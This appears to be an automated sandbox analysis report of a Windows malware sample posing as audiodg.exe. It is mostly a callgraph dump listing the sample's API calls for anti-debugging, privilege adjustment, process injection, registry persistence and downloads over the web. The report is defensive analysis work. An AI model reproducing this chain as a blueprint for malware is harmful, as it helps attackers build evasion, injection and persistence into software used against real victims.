InternetCloseHandle InternetCloseHandle Sleep 1419->1421 1422 7ff6ec8422ae 1419->1422 1420->1419 1423 7ff6ec84223e InternetCloseHandle Sleep 1420->1423 1421->1416 1424 7ff6ec8422b8 InternetCloseHandle InternetOpenUrlW 1422->1424 1425 7ff6ec842315 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1422->1425 1423->1416 1424->1425 1426 7ff6ec8422fa InternetCloseHandle Sleep 1424->1426 1427 7ff6ec84237a InternetCloseHandle InternetCloseHandle 1425->1427 1431 7ff6ec842394 1425->1431 1426->1416 1428 7ff6ec842413 1427->1428 1429 7ff6ec84239c InternetReadFile 1430 7ff6ec8423ea InternetCloseHandle InternetCloseHandle 1429->1430 1429->1431 1430->1428 1431->1429 1431->1430 833 7ff6ec843418 893 7ff6ec84153c 833->893 838 7ff6ec843438 1127 7ff6ec8440b0 GetCurrentProcess OpenProcessToken 838->1127 839 7ff6ec843430 ExitProcess 843 7ff6ec843453 844 7ff6ec843468 843->844 845 7ff6ec8434b7 843->845 846 7ff6ec8441f0 3 API calls 844->846 848 7ff6ec843508 845->848 849 7ff6ec8434cc 845->849 847 7ff6ec843474 846->847 850 7ff6ec84347b 847->850 851 7ff6ec84348e ExitProcess 847->851 856 7ff6ec84351d 848->856 857 7ff6ec84355e 848->857 852 7ff6ec8441f0 3 API calls 849->852 853 7ff6ec8441f0 3 API calls 850->853 854 7ff6ec8434d8 852->854 855 7ff6ec843487 853->855 858 7ff6ec8434e7 854->858 859 7ff6ec8434df ExitProcess 854->859 855->851 860 7ff6ec843496 855->860 1142 7ff6ec8441f0 CreateMutexExA 856->1142 1160 7ff6ec843a40 857->1160 1155 7ff6ec843218 858->1155 1146 7ff6ec8432a8 860->1146 865 7ff6ec84349b 869 7ff6ec8434af ExitProcess 865->869 870 7ff6ec8434a2 Sleep 865->870 867 7ff6ec8434ec 873 7ff6ec843500 ExitProcess 867->873 874 7ff6ec8434f3 Sleep 867->874 870->865 871 7ff6ec843538 877 7ff6ec843218 21 API calls 871->877 872 7ff6ec843530 ExitProcess 874->867 880 7ff6ec84353d 877->880 878 7ff6ec843576 881 7ff6ec8441f0 3 API calls 878->881 879 7ff6ec8435ca CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 882 7ff6ec843551 ExitProcess 880->882 883 7ff6ec843544 Sleep 880->883 884 7ff6ec843582 881->884 883->880 885 7ff6ec84359c ExitProcess 884->885 886 7ff6ec8441f0 3 API calls 884->886 887 7ff6ec843595 886->887 887->885 888 7ff6ec8435a4 887->888 889 7ff6ec8432a8 44 API calls 888->889 890 7ff6ec8435a9 889->890 891 7ff6ec8435bd ExitProcess 890->891 892 7ff6ec8435b0 Sleep 890->892 892->890 1170 7ff6ec84149c LoadLibraryA GetProcAddress 893->1170 895 7ff6ec8415c8 1171 7ff6ec84149c LoadLibraryA GetProcAddress 895->1171 897 7ff6ec8415e2 1172 7ff6ec8414ec LoadLibraryA GetProcAddress 897->1172 899 7ff6ec8415fc 1173 7ff6ec8414ec LoadLibraryA GetProcAddress 899->1173 901 7ff6ec841616 1174 7ff6ec8414ec LoadLibraryA GetProcAddress 901->1174 903 7ff6ec841630 1175 7ff6ec8414ec LoadLibraryA GetProcAddress 903->1175 905 7ff6ec84164a 1176 7ff6ec8414ec LoadLibraryA GetProcAddress 905->1176 907 7ff6ec841664 1177 7ff6ec8414ec LoadLibraryA GetProcAddress 907->1177 909 7ff6ec84167e 1178 7ff6ec8414ec LoadLibraryA GetProcAddress 909->1178 911 7ff6ec841698 1179 7ff6ec8414ec LoadLibraryA GetProcAddress 911->1179 913 7ff6ec8416b2 1180 7ff6ec8414ec LoadLibraryA GetProcAddress 913->1180 915 7ff6ec8416cc 1181 7ff6ec84149c LoadLibraryA GetProcAddress 915->1181 917 7ff6ec8416e6 1182 7ff6ec84149c LoadLibraryA GetProcAddress 917->1182 919 7ff6ec841700 1183 7ff6ec84149c LoadLibraryA GetProcAddress 919->1183 921 7ff6ec84171a 1184 7ff6ec84149c LoadLibraryA GetProcAddress 921->1184 923 7ff6ec841734 1185 7ff6ec8414ec LoadLibraryA GetProcAddress 923->1185 925 7ff6ec84174e 1186 7ff6ec8414ec LoadLibraryA GetProcAddress 925->1186 927 7ff6ec841768 1187 7ff6ec8414ec LoadLibraryA GetProcAddress 927->1187 929 7ff6ec841782 1188 7ff6ec8414ec LoadLibraryA GetProcAddress 929->1188 931 7ff6ec84179c 1189 7ff6ec8414ec LoadLibraryA GetProcAddress 931->1189 933 7ff6ec8417b6 1190 7ff6ec8414ec LoadLibraryA GetProcAddress 933->1190 935 7ff6ec8417d0 1191 7ff6ec8414ec LoadLibraryA GetProcAddress 935->1191 937 7ff6ec8417ea 1192 7ff6ec8414ec LoadLibraryA GetProcAddress 937->1192 939 7ff6ec841804 1193 7ff6ec8414ec LoadLibraryA GetProcAddress 939->1193 941 7ff6ec84181e 1194 7ff6ec8414ec LoadLibraryA GetProcAddress 941->1194 943 7ff6ec841838 1195 7ff6ec8414ec LoadLibraryA GetProcAddress 943->1195 945 7ff6ec841852 1196 7ff6ec8414ec LoadLibraryA GetProcAddress 945->1196 947 7ff6ec84186c 1197 7ff6ec8414ec LoadLibraryA GetProcAddress 947->1197 949 7ff6ec841886 1198 7ff6ec8414ec LoadLibraryA GetProcAddress 949->1198 951 7ff6ec8418a0 1199 7ff6ec8414ec LoadLibraryA GetProcAddress 951->1199 953 7ff6ec8418ba 1200 7ff6ec8414ec LoadLibraryA GetProcAddress 953->1200 955 7ff6ec8418d4 1201 7ff6ec8414ec LoadLibraryA GetProcAddress 955->1201 957 7ff6ec8418ee 1202 7ff6ec8414ec LoadLibraryA GetProcAddress 957->1202 959 7ff6ec841908 1203 7ff6ec8414ec LoadLibraryA GetProcAddress 959->1203 961 7ff6ec841922 1204 7ff6ec8414ec LoadLibraryA GetProcAddress 961->1204 963 7ff6ec84193c 1205 7ff6ec8414ec LoadLibraryA GetProcAddress 963->1205 965 7ff6ec841956 1206 7ff6ec8414ec LoadLibraryA GetProcAddress 965->1206 967 7ff6ec841970 1207 7ff6ec8414ec LoadLibraryA GetProcAddress 967->1207 969 7ff6ec84198a 1208 7ff6ec8414ec LoadLibraryA GetProcAddress 969->1208 971 7ff6ec8419a4 1209 7ff6ec8414ec LoadLibraryA GetProcAddress 971->1209 973 7ff6ec8419be 1210 7ff6ec8414ec LoadLibraryA GetProcAddress 973->1210 975 7ff6ec8419d8 1211 7ff6ec8414ec LoadLibraryA GetProcAddress 975->1211 977 7ff6ec8419f2 1212 7ff6ec8414ec LoadLibraryA GetProcAddress 977->1212 979 7ff6ec841a0c 1213 7ff6ec8414ec LoadLibraryA GetProcAddress 979->1213 981 7ff6ec841a26 1214 7ff6ec8414ec LoadLibraryA GetProcAddress 981->1214 983 7ff6ec841a40 1215 7ff6ec8414ec LoadLibraryA GetProcAddress 983->1215 985 7ff6ec841a5a 1216 7ff6ec8414ec LoadLibraryA GetProcAddress 985->1216 987 7ff6ec841a74 1217 7ff6ec8414ec LoadLibraryA GetProcAddress 987->1217 989 7ff6ec841a8e 1218 7ff6ec8414ec LoadLibraryA GetProcAddress 989->1218 991 7ff6ec841aa8 1219 7ff6ec8414ec LoadLibraryA GetProcAddress 991->1219 993 7ff6ec841ac2 1220 7ff6ec8414ec LoadLibraryA GetProcAddress 993->1220 995 7ff6ec841adc 1221 7ff6ec8414ec LoadLibraryA GetProcAddress 995->1221 997 7ff6ec841af6 1222 7ff6ec8414ec LoadLibraryA GetProcAddress 997->1222 999 7ff6ec841b10 1223 7ff6ec8414ec LoadLibraryA GetProcAddress 999->1223 1001 7ff6ec841b2a 1224 7ff6ec8414ec LoadLibraryA GetProcAddress 1001->1224 1003 7ff6ec841b44 1225 7ff6ec8414ec LoadLibraryA GetProcAddress 1003->1225 1005 7ff6ec841b5e 1226 7ff6ec8414ec LoadLibraryA GetProcAddress 1005->1226 1007 7ff6ec841b78 1227 7ff6ec8414ec LoadLibraryA GetProcAddress 1007->1227 1009 7ff6ec841b92 1228 7ff6ec8414ec LoadLibraryA GetProcAddress 1009->1228 1011 7ff6ec841bac 1229 7ff6ec8414ec LoadLibraryA GetProcAddress 1011->1229 1013 7ff6ec841bc6 1230 7ff6ec8414ec LoadLibraryA GetProcAddress 1013->1230 1015 7ff6ec841be0 1231 7ff6ec8414ec LoadLibraryA GetProcAddress 1015->1231 1017 7ff6ec841bfa 1232 7ff6ec8414ec LoadLibraryA GetProcAddress 1017->1232 1019 7ff6ec841c14 1233 7ff6ec8414ec LoadLibraryA GetProcAddress 1019->1233 1021 7ff6ec841c2e 1234 7ff6ec8414ec LoadLibraryA GetProcAddress 1021->1234 1023 7ff6ec841c48 1235 7ff6ec8414ec LoadLibraryA GetProcAddress 1023->1235 1025 7ff6ec841c62 1236 7ff6ec8414ec LoadLibraryA GetProcAddress 1025->1236 1027 7ff6ec841c7c 1237 7ff6ec8414ec LoadLibraryA GetProcAddress 1027->1237 1029 7ff6ec841c96 1238 7ff6ec8414ec LoadLibraryA GetProcAddress 1029->1238 1031 7ff6ec841cb0 1239 7ff6ec8414ec LoadLibraryA GetProcAddress 1031->1239 1033 7ff6ec841cca 1240 7ff6ec8414ec LoadLibraryA GetProcAddress 1033->1240 1035 7ff6ec841ce4 1241 7ff6ec8414ec LoadLibraryA GetProcAddress 1035->1241 1037 7ff6ec841cfe 1242 7ff6ec8414ec LoadLibraryA GetProcAddress 1037->1242 1039 7ff6ec841d18 1243 7ff6ec8414ec LoadLibraryA GetProcAddress 1039->1243 1041 7ff6ec841d32 1244 7ff6ec8414ec LoadLibraryA GetProcAddress 1041->1244 1043 7ff6ec841d4c 1245 7ff6ec8414ec LoadLibraryA GetProcAddress 1043->1245 1045 7ff6ec841d66 1246 7ff6ec8414ec LoadLibraryA GetProcAddress 1045->1246 1047 7ff6ec841d80 1247 7ff6ec8414ec LoadLibraryA GetProcAddress 1047->1247 1049 7ff6ec841d9a 1248 7ff6ec8414ec LoadLibraryA GetProcAddress 1049->1248 1051 7ff6ec841db4 1249 7ff6ec8414ec LoadLibraryA GetProcAddress 1051->1249 1053 7ff6ec841dce 1250 7ff6ec8414ec LoadLibraryA GetProcAddress 1053->1250 1055 7ff6ec841de8 1251 7ff6ec8414ec LoadLibraryA GetProcAddress 1055->1251 1057 7ff6ec841e02 1252 7ff6ec8414ec LoadLibraryA GetProcAddress 1057->1252 1059 7ff6ec841e1c 1253 7ff6ec8414ec LoadLibraryA GetProcAddress 1059->1253 1061 7ff6ec841e36 1254 7ff6ec8414ec LoadLibraryA GetProcAddress 1061->1254 1063 7ff6ec841e50 1255 7ff6ec8414ec LoadLibraryA GetProcAddress 1063->1255 1065 7ff6ec841e6a 1256 7ff6ec8414ec LoadLibraryA GetProcAddress 1065->1256 1067 7ff6ec841e84 1257 7ff6ec8414ec LoadLibraryA GetProcAddress 1067->1257 1069 7ff6ec841e9e 1258 7ff6ec8414ec LoadLibraryA GetProcAddress 1069->1258 1071 7ff6ec841eb8 1259 7ff6ec8414ec LoadLibraryA GetProcAddress 1071->1259 1073 7ff6ec841ed2 1260 7ff6ec8414ec LoadLibraryA GetProcAddress 1073->1260 1075 7ff6ec841eec 1261 7ff6ec8414ec LoadLibraryA GetProcAddress 1075->1261 1077 7ff6ec841f06 1262 7ff6ec8414ec LoadLibraryA GetProcAddress 1077->1262 1079 7ff6ec841f20 1263 7ff6ec8414ec LoadLibraryA GetProcAddress 1079->1263 1081 7ff6ec841f3a 1264 7ff6ec8414ec LoadLibraryA GetProcAddress 1081->1264 1083 7ff6ec841f54 1265 7ff6ec8414ec LoadLibraryA GetProcAddress 1083->1265 1085 7ff6ec841f6e 1266 7ff6ec8414ec LoadLibraryA GetProcAddress 1085->1266 1087 7ff6ec841f88 1267 7ff6ec8414ec LoadLibraryA GetProcAddress 1087->1267 1089 7ff6ec841fa2 1268 7ff6ec8414ec LoadLibraryA GetProcAddress 1089->1268 1091 7ff6ec841fbc 1269 7ff6ec84149c LoadLibraryA GetProcAddress 1091->1269 1093 7ff6ec841fd6 1270 7ff6ec8414ec LoadLibraryA GetProcAddress 1093->1270 1095 7ff6ec841ff0 1271 7ff6ec8414ec LoadLibraryA GetProcAddress 1095->1271 1097 7ff6ec84200a 1272 7ff6ec8414ec LoadLibraryA GetProcAddress 1097->1272 1099 7ff6ec842024 1273 7ff6ec8414ec LoadLibraryA GetProcAddress 1099->1273 1101 7ff6ec84203e 1274 7ff6ec8414ec LoadLibraryA GetProcAddress 1101->1274 1103 7ff6ec842058 1275 7ff6ec8414ec LoadLibraryA GetProcAddress 1103->1275 1105 7ff6ec842072 1276 7ff6ec8414ec LoadLibraryA GetProcAddress 1105->1276 1107 7ff6ec84208c 1277 7ff6ec84149c LoadLibraryA GetProcAddress 1107->1277 1109 7ff6ec8420a6 1278 7ff6ec84149c LoadLibraryA GetProcAddress 1109->1278 1111 7ff6ec8420c0 1279 7ff6ec8414ec LoadLibraryA GetProcAddress 1111->1279 1113 7ff6ec8420da 1280 7ff6ec8414ec LoadLibraryA GetProcAddress 1113->1280 1115 7ff6ec8420f4 1281 7ff6ec8414ec LoadLibraryA GetProcAddress 1115->1281 1117 7ff6ec84210e 1282 7ff6ec8414ec LoadLibraryA GetProcAddress 1117->1282 1119 7ff6ec842128 1283 7ff6ec8414ec LoadLibraryA GetProcAddress 1119->1283 1121 7ff6ec842142 1284 7ff6ec8414ec LoadLibraryA GetProcAddress 1121->1284 1123 7ff6ec84215c 1124 7ff6ec8431b8 IsDebuggerPresent 1123->1124 1125 7ff6ec8431ca GetCurrentProcess CheckRemoteDebuggerPresent 1124->1125 1126 7ff6ec8431c6 1124->1126 1125->1126 1126->838 1126->839 1128 7ff6ec8440d6 GetTokenInformation 1127->1128 1129 7ff6ec84343d 1127->1129 1285 7ff6ec843b20 VirtualAlloc 1128->1285 1138 7ff6ec843cb0 GetModuleFileNameW 1129->1138 1131 7ff6ec844107 GetTokenInformation 1132 7ff6ec84414e AdjustTokenPrivileges CloseHandle 1131->1132 1133 7ff6ec844134 CloseHandle 1131->1133 1286 7ff6ec843af0 1132->1286 1134 7ff6ec843af0 VirtualFree 1133->1134 1135 7ff6ec844149 1134->1135 1135->1129 1139 7ff6ec843cdb PathFindFileNameW wcslen 1138->1139 1140 7ff6ec843d9e wcsncpy 1138->1140 1141 7ff6ec843d15 1139->1141 1140->1141 1141->843 1143 7ff6ec843529 1142->1143 1144 7ff6ec84421c GetLastError 1142->1144 1143->871 1143->872 1144->1143 1145 7ff6ec844229 CloseHandle 1144->1145 1145->1143 1289 7ff6ec843890 1146->1289 1148 7ff6ec8432b9 1292 7ff6ec844530 CreateFileW 1148->1292 1150 7ff6ec8432d1 1151 7ff6ec843313 CreateThread 1150->1151 1304 7ff6ec844090 1150->1304 1151->865 1156 7ff6ec843890 11 API calls 1155->1156 1157 7ff6ec843228 1156->1157 1339 7ff6ec844300 CreateFileW 1157->1339 1161 7ff6ec843710 3 API calls 1160->1161 1162 7ff6ec843a6b 1161->1162 1163 7ff6ec843890 11 API calls 1162->1163 1164 7ff6ec843a75 GetModuleFileNameW DeleteFileW CopyFileW 1163->1164 1165 7ff6ec843ab7 SetFileAttributesW 1164->1165 1166 7ff6ec843563 1164->1166 1351 7ff6ec843980 RegOpenKeyExW 1165->1351 1168 7ff6ec8433a8 GetVersionExW 1166->1168 1169 7ff6ec8433d9 1168->1169 1169->878 1169->879 1170->895 1171->897 1172->899 1173->901 1174->903 1175->905 1176->907 1177->909 1178->911 1179->913 1180->915 1181->917 1182->919 1183->921 1184->923 1185->925 1186->927 1187->929 1188->931 1189->933 1190->935 1191->937 1192->939 1193->941 1194->943 1195->945 1196->947 1197->949 1198->951 1199->953 1200->955 1201->957 1202->959 1203->961 1204->963 1205->965 1206->967 1207->969 1208->971 1209->973 1210->975 1211->977 1212->979 1213->981 1214->983 1215->985 1216->987 1217->989 1218->991 1219->993 1220->995 1221->997 1222->999 1223->1001 1224->1003 1225->1005 1226->1007 1227->1009 1228->1011 1229->1013 1230->1015 1231->1017 1232->1019 1233->1021 1234->1023 1235->1025 1236->1027 1237->1029 1238->1031 1239->1033 1240->1035 1241->1037 1242->1039 1243->1041 1244->1043 1245->1045 1246->1047 1247->1049 1248->1051 1249->1053 1250->1055 1251->1057 1252->1059 1253->1061 1254->1063 1255->1065 1256->1067 1257->1069 1258->1071 1259->1073 1260->1075 1261->1077 1262->1079 1263->1081 1264->1083 1265->1085 1266->1087 1267->1089 1268->1091 1269->1093 1270->1095 1271->1097 1272->1099 1273->1101 1274->1103 1275->1105 1276->1107 1277->1109 1278->1111 1279->1113 1280->1115 1281->1117 1282->1119 1283->1121 1284->1123 1285->1131 1287 7ff6ec843b01 VirtualFree 1286->1287 1288 7ff6ec843b14 1286->1288 1287->1288 1288->1129 1323 7ff6ec843710 GetWindowsDirectoryW 1289->1323 1291 7ff6ec8438bf 8 API calls 1291->1148 1293 7ff6ec84458a 1292->1293 1294 7ff6ec844591 GetFileSize GetProcessHeap RtlAllocateHeap 1292->1294 1293->1150 1295 7ff6ec8445ec ReadFile 1294->1295 1296 7ff6ec8445da CloseHandle 1294->1296 1297 7ff6ec84463b 1295->1297 1298 7ff6ec844613 GetProcessHeap HeapFree CloseHandle 1295->1298 1296->1293 1299 7ff6ec844654 GetProcessHeap HeapFree CloseHandle 1297->1299 1301 7ff6ec84467c 1297->1301 1298->1293 1299->1293 1300 7ff6ec8447e7 GetProcessHeap HeapFree CloseHandle 1300->1293 1301->1300 1302 7ff6ec844737 GetProcessHeap RtlAllocateHeap 1301->1302 1303 7ff6ec844780 1302->1303 1303->1300 1328 7ff6ec843fd0 CreateToolhelp32Snapshot 1304->1328 1307 7ff6ec8410d8 OpenProcess 1308 7ff6ec84111f 1307->1308 1309 7ff6ec841115 1307->1309 1335 7ff6ec8413c4 GetModuleHandleA GetProcAddress 1308->1335 1309->1151 1311 7ff6ec84112c 1311->1309 1312 7ff6ec8411fe VirtualAllocEx 1311->1312 1312->1309 1313 7ff6ec84124f WriteProcessMemory 1312->1313 1313->1309 1314 7ff6ec841286 WriteProcessMemory 1313->1314 1314->1309 1315 7ff6ec8412d1 1314->1315 1337 7ff6ec841444 GetSystemInfo 1315->1337 1318 7ff6ec8412fe GetModuleHandleA GetProcAddress 1318->1309 1319 7ff6ec841338 1318->1319 1319->1309 1322 7ff6ec841399 CloseHandle 1319->1322 1320 7ff6ec841444 GetSystemInfo 1321 7ff6ec8412f4 1320->1321 1321->1318 1321->1322 1322->1309 1324 7ff6ec84375a 1323->1324 1325 7ff6ec843764 GetVolumeInformationW 1323->1325 1324->1325 1326 7ff6ec8437e0 1325->1326 1327 7ff6ec84384a wsprintfW 1326->1327 1327->1291 1329 7ff6ec8432fe 1328->1329 1330 7ff6ec84400b Process32FirstW 1328->1330 1329->1307 1331 7ff6ec84402a wcscmp 1330->1331 1332 7ff6ec844065 CloseHandle 1330->1332 1333 7ff6ec844041 1331->1333 1334 7ff6ec84404e Process32NextW 1331->1334 1332->1329 1333->1332 1334->1331 1334->1332 1336 7ff6ec8413ff 1335->1336 1336->1311 1338 7ff6ec8412ea 1337->1338 1338->1318 1338->1320 1340 7ff6ec844377 GetLastError 1339->1340 1341 7ff6ec844356 1339->1341 1343 7ff6ec84323b CreateThread Sleep CreateThread 1340->1343 1345 7ff6ec844250 GetFileSize 1341->1345 1343->867 1350 7ff6ec843b20 VirtualAlloc 1345->1350 1347 7ff6ec84427c 1348 7ff6ec844290 SetFilePointer ReadFile 1347->1348 1349 7ff6ec8442c6 CloseHandle 1347->1349 1348->1349 1349->1343 1350->1347 1352 7ff6ec8439c1 1351->1352 1353 7ff6ec8439c5 RegSetValueExW RegCloseKey 1351->1353 1352->1166 1353->1352 1403 7ff6ec842f38 1404 7ff6ec843890 11 API calls 1403->1404 1405 7ff6ec842f77 1404->1405 1406 7ff6ec844530 17 API calls 1405->1406 1407 7ff6ec842f9b 1406->1407 1408 7ff6ec844090 5 API calls 1407->1408 1409 7ff6ec842fbe 1408->1409 1410 7ff6ec8410d8 10 API calls 1409->1410 1411 7ff6ec842fd3 GetProcessHeap HeapFree 1410->1411 1453 7ff6ec843078 1458 7ff6ec843081 1453->1458 1454 7ff6ec84316d 1457 7ff6ec843bf0 RegDeleteKeyW 1457->1458 1458->1454 1458->1457 1459 7ff6ec843df0 9 API calls 1458->1459 1460 7ff6ec843980 3 API calls 1458->1460 1462 7ff6ec844410 CreateFileW 1458->1462 1467 7ff6ec843b50 RegOpenKeyExW 1458->1467 1459->1458 1461 7ff6ec84315d Sleep 1460->1461 1461->1458 1463 7ff6ec8444a6 1462->1463 1464 7ff6ec84446b 1462->1464 1463->1458 1470 7ff6ec844390 SetFilePointer WriteFile SetEndOfFile 1464->1470 1466 7ff6ec844487 SetFileAttributesW CloseHandle 1466->1463 1468 7ff6ec843bde 1467->1468 1469 7ff6ec843ba4 RegSetValueExW RegCloseKey 1467->1469 1468->1458 1469->1468 1470->1466

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF6EC8436C8 1 Function_00007FF6EC84E6CD 2 Function_00007FF6EC843FD0 3 Function_00007FF6EC8436B8 4 Function_00007FF6EC8431B8 5 Function_00007FF6EC84EDB8 6 Function_00007FF6EC8444C0 7 Function_00007FF6EC84E6C5 8 Function_00007FF6EC8435C5 9 Function_00007FF6EC8413C4 10 Function_00007FF6EC84B2C0 11 Function_00007FF6EC84F7E6 12 Function_00007FF6EC84D2E7 13 Function_00007FF6EC8414EC 14 Function_00007FF6EC84BBF2 15 Function_00007FF6EC843DF0 16 Function_00007FF6EC843BF0 17 Function_00007FF6EC843AF0 18 Function_00007FF6EC8441F0 19 Function_00007FF6EC8501DA 20 Function_00007FF6EC8424D8 48 Function_00007FF6EC842418 20->48 78 Function_00007FF6EC842458 20->78 104 Function_00007FF6EC842498 20->104 21 Function_00007FF6EC8410D8 21->9 41 Function_00007FF6EC841000 21->41 66 Function_00007FF6EC841444 21->66 22 Function_00007FF6EC84B0D8 23 Function_00007FF6EC843EE0 24 Function_00007FF6EC8436E0 25 Function_00007FF6EC84D2E3 26 Function_00007FF6EC84C2E4 27 Function_00007FF6EC84D2E5 28 Function_00007FF6EC84CCE1 29 Function_00007FF6EC84D70B 30 Function_00007FF6EC843008 31 Function_00007FF6EC842E08 30->31 32 Function_00007FF6EC84EC09 33 Function_00007FF6EC844410 86 Function_00007FF6EC844390 33->86 34 Function_00007FF6EC843710 34->24 35 Function_00007FF6EC84BBFB 36 Function_00007FF6EC84E9F6 37 Function_00007FF6EC84BBF7 38 Function_00007FF6EC84C4F8 39 Function_00007FF6EC84BBF9 40 Function_00007FF6EC844300 58 Function_00007FF6EC844250 40->58 42 Function_00007FF6EC84DE04 43 Function_00007FF6EC84EA05 44 Function_00007FF6EC843C30 45 Function_00007FF6EC844530 45->6 46 Function_00007FF6EC843418 46->4 46->18 46->23 47 Function_00007FF6EC843218 46->47 63 Function_00007FF6EC84153C 46->63 65 Function_00007FF6EC843A40 46->65 95 Function_00007FF6EC8433A8 46->95 96 Function_00007FF6EC8432A8 46->96 100 Function_00007FF6EC8440B0 46->100 101 Function_00007FF6EC843CB0 46->101 47->40 84 Function_00007FF6EC843890 47->84 49 Function_00007FF6EC843B20 50 Function_00007FF6EC84EC20 51 Function_00007FF6EC843348 51->20 52 Function_00007FF6EC84F74B 53 Function_00007FF6EC84F747 54 Function_00007FF6EC84B248 55 Function_00007FF6EC84F749 56 Function_00007FF6EC84B052 57 Function_00007FF6EC84B152 58->49 59 Function_00007FF6EC843B50 60 Function_00007FF6EC84B04E 61 Function_00007FF6EC84C14F 62 Function_00007FF6EC842F38 62->21 62->44 62->45 62->84 85 Function_00007FF6EC844090 62->85 63->13 106 Function_00007FF6EC84149C 63->106 64 Function_00007FF6EC84DC37 65->34 65->84 92 Function_00007FF6EC843980 65->92 67 Function_00007FF6EC843368 67->20 68 Function_00007FF6EC84216C 69 Function_00007FF6EC84E668 70 Function_00007FF6EC84B772 71 Function_00007FF6EC84EA72 72 Function_00007FF6EC84B26F 73 Function_00007FF6EC84EC71 74 Function_00007FF6EC843559 75 Function_00007FF6EC84B05A 76 Function_00007FF6EC84D65A 77 Function_00007FF6EC84FE5A 79 Function_00007FF6EC84B061 80 Function_00007FF6EC841088 81 Function_00007FF6EC843188 81->30 82 Function_00007FF6EC843388 82->20 83 Function_00007FF6EC84E289 84->34 85->2 87 Function_00007FF6EC84DA94 88 Function_00007FF6EC843078 88->15 88->16 88->33 88->59 88->92 89 Function_00007FF6EC84B776 90 Function_00007FF6EC84B778 91 Function_00007FF6EC84E079 93 Function_00007FF6EC84147F 94 Function_00007FF6EC84E07F 96->21 96->44 96->45 96->84 96->85 97 Function_00007FF6EC842EA8 98 Function_00007FF6EC84E4AB 99 Function_00007FF6EC84FEA9 100->17 100->49 102 Function_00007FF6EC84E6B4 103 Function_00007FF6EC8500B0 105 Function_00007FF6EC84CE9D 107 Function_00007FF6EC8501A2 108 Function_00007FF6EC84F6A3 109 Function_00007FF6EC84E0A5 110 Function_00007FF6EC84E0A1

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF6EC843418 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff6ec843418-7ff6ec84342e call 7ff6ec84153c call 7ff6ec8431b8 236 7ff6ec843438-7ff6ec843466 call 7ff6ec8440b0 call 7ff6ec843cb0 call 7ff6ec843ee0 231->236 237 7ff6ec843430-7ff6ec843432 ExitProcess 231->237 244 7ff6ec843468-7ff6ec843479 call 7ff6ec8441f0 236->244 245 7ff6ec8434b7-7ff6ec8434ca call 7ff6ec843ee0 236->245 252 7ff6ec84347b-7ff6ec84348c call 7ff6ec8441f0 244->252 253 7ff6ec84348e-7ff6ec843490 ExitProcess 244->253 250 7ff6ec843508-7ff6ec84351b call 7ff6ec843ee0 245->250 251 7ff6ec8434cc-7ff6ec8434dd call 7ff6ec8441f0 245->251 260 7ff6ec84351d-7ff6ec84352e call 7ff6ec8441f0 250->260 261 7ff6ec84355e-7ff6ec843574 call 7ff6ec843a40 call 7ff6ec8433a8 250->261 262 7ff6ec8434e7 call 7ff6ec843218 251->262 263 7ff6ec8434df-7ff6ec8434e1 ExitProcess 251->263 252->253 264 7ff6ec843496 call 7ff6ec8432a8 252->264 275 7ff6ec843538 call 7ff6ec843218 260->275 276 7ff6ec843530-7ff6ec843532 ExitProcess 260->276 282 7ff6ec843576-7ff6ec843587 call 7ff6ec8441f0 261->282 283 7ff6ec8435ca-7ff6ec8436a2 CreateThread * 3 WaitForMultipleObjects ExitProcess 261->283 271 7ff6ec8434ec-7ff6ec8434f1 262->271 269 7ff6ec84349b-7ff6ec8434a0 264->269 273 7ff6ec8434af-7ff6ec8434b1 ExitProcess 269->273 274 7ff6ec8434a2-7ff6ec8434ad Sleep 269->274 277 7ff6ec843500-7ff6ec843502 ExitProcess 271->277 278 7ff6ec8434f3-7ff6ec8434fe Sleep 271->278 274->269 284 7ff6ec84353d-7ff6ec843542 275->284 278->271 289 7ff6ec843589-7ff6ec84359a call 7ff6ec8441f0 282->289 290 7ff6ec84359c-7ff6ec84359e ExitProcess 282->290 286 7ff6ec843551-7ff6ec843553 ExitProcess 284->286 287 7ff6ec843544-7ff6ec84354f Sleep 284->287 287->284 289->290 293 7ff6ec8435a4 call 7ff6ec8432a8 289->293 295 7ff6ec8435a9-7ff6ec8435ae 293->295 296 7ff6ec8435bd-7ff6ec8435bf ExitProcess 295->296 297 7ff6ec8435b0-7ff6ec8435bb Sleep 295->297 297->295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1649423034.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649389168.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649455241.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649495890.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649526207.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1649553221.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: e100d8103b68b422bfc8a5689cfe0c77aa94b21dc195a0258a936a93391890d3
                                                                                                                                                                                                                        • Instruction ID: 5a2aa1f7589e8230427a66411971a914f1777616e371db2ee591774198ada568
